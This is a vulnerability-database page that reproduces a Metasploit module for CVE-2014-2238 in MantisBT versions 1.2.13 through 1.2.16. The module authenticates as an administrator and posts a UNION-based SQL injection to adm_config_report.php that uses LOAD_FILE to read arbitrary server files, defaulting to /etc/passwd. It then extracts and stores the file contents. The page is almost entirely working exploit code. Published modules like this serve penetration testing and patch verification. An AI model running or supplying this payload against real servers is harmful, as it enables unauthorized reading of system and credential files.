Lucene search
K

MantisBT Admin SQL Injection Arbitrary File Read

🗓️ 03 Mar 2014 20:36:38Reported by Jakub Galczyk, Brandon Perry <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 54 Views

MantisBT Admin SQL Injection Arbitrary File Read. Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack. This vuln was fixed in 1.2.17

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MantisBT Admin SQL Injection Arbitrary File Read",
      'Description'    => %q{
      Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if
      an attacker can gain access to administrative credentials.

      This vuln was fixed in 1.2.17.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jakub Galczyk', #initial discovery
          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
        ],
      'References'     =>
        [
          ['CVE', '2014-2238'],
          ['URL', 'https://www.mantisbt.org/bugs/view.php?id=17055']
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => '2014-02-28'))

      register_options(
      [
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
        OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
        OptString.new('PASSWORD', [ true, 'Single password', 'root']),
        OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
      ])

  end

  def run
    post = {
      'return' => 'index.php',
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'secure_session' => 'on'
    }

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/login.php'),
      'method' => 'POST',
      'vars_post' => post
    })

    if !resp or !resp.body
      fail_with(Failure::UnexpectedReply, "Error in server response. Ensure the server IP is correct.")
    end

    cookie = resp.get_cookies

    if cookie == ''
      fail_with(Failure::NoAccess, "Authentication failed")
    end

    filepath = datastore['FILEPATH'].unpack("H*")[0]

    payload = "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27"
    payload << "+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE"
    payload << "%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter"

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
      'method' => 'POST',
      'data' => payload,
      'cookie' => cookie,
    })

    if !resp or !resp.body
      fail_with(Failure::UnexpectedReply, "Error in server response")
    end

    # qgjuq is prepended to the result of the sql injection
    # qirpq is appended to the result of the sql injection
    # This allows the use of a simple regex to grab the contents
    # of the file easily from the page source.
    file = /qgjuq(.*)qirpq/.match(resp.body)

    file = file[0].gsub('qgjuq', '').gsub('qirpq', '')
    file = [file].pack("H*")

    path = store_loot("mantisbt.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH'])

    if path and path != ''
      print_good("File saved to: #{path}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
0.8Low risk
Vulners AI Score0.8
CVSS 26.5
EPSS0.11311
54